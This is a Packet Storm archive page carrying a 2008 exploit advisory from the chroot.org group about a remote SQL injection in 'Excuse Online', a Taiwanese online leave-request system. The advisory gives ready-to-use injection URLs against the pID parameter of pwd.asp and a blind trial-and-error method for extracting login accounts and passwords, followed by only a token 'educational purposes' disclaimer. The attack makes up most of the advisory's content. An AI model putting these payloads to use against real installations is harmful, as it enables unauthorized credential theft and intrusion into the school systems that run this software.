what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

excuseonline-sql.txt

excuseonline-sql.txt
Posted May 27, 2008
Authored by unohope | Site chroot.org

Excuse Online suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | c84ad6c4dd23b559510779e93b1dc9cb1edb603e3a47c46fa2c94ddacb789c3f

excuseonline-sql.txt

Change Mirror Download
  _____ _   _ _____  _____ _____ _____  
/ ___| |_| | _ \| _ | _ |_ _|
| (___| _ | [_)_/| (_) | (_) | | |
\_____|_| |_|_| |_||_____|_____| |_|
C. H. R. O. O. T. SECURITY GROUP
- -- ----- --- -- -- ---- --- -- -
http://www.chroot.org

_ _ _ _____ ____ ____ __ _
Hacks In Taiwan | |_| | |_ _| __| | \| |
Conference 2008 | _ | | | | | (__| () | |
|_| |_|_| |_| \____|____|_|\__|
http://www.hitcon.org


Title :: Excuse Online (pwd) SQL Injection Vulnerability

Author :: unohope [at] chroot [dot] org

IRC :: irc.chroot.org #chroot

ScriptName :: 線上請假系統

Download :: http://netlab.kh.edu.tw/download/excuse.rar

Mirror :: http://www.badongo.com/file/9514356

_______________
[SQL Injection]

- {pwd.asp} -

http://localhost/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+登入碼+like+'%25 // for login account

http://localhost/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+密碼+like+'%25 // for login password

If matched then return "Input Error in Account",
else return "Can Not Find The Account",
try error till you got it!

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!


# 2008/5/24 - chrO.ot group #
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close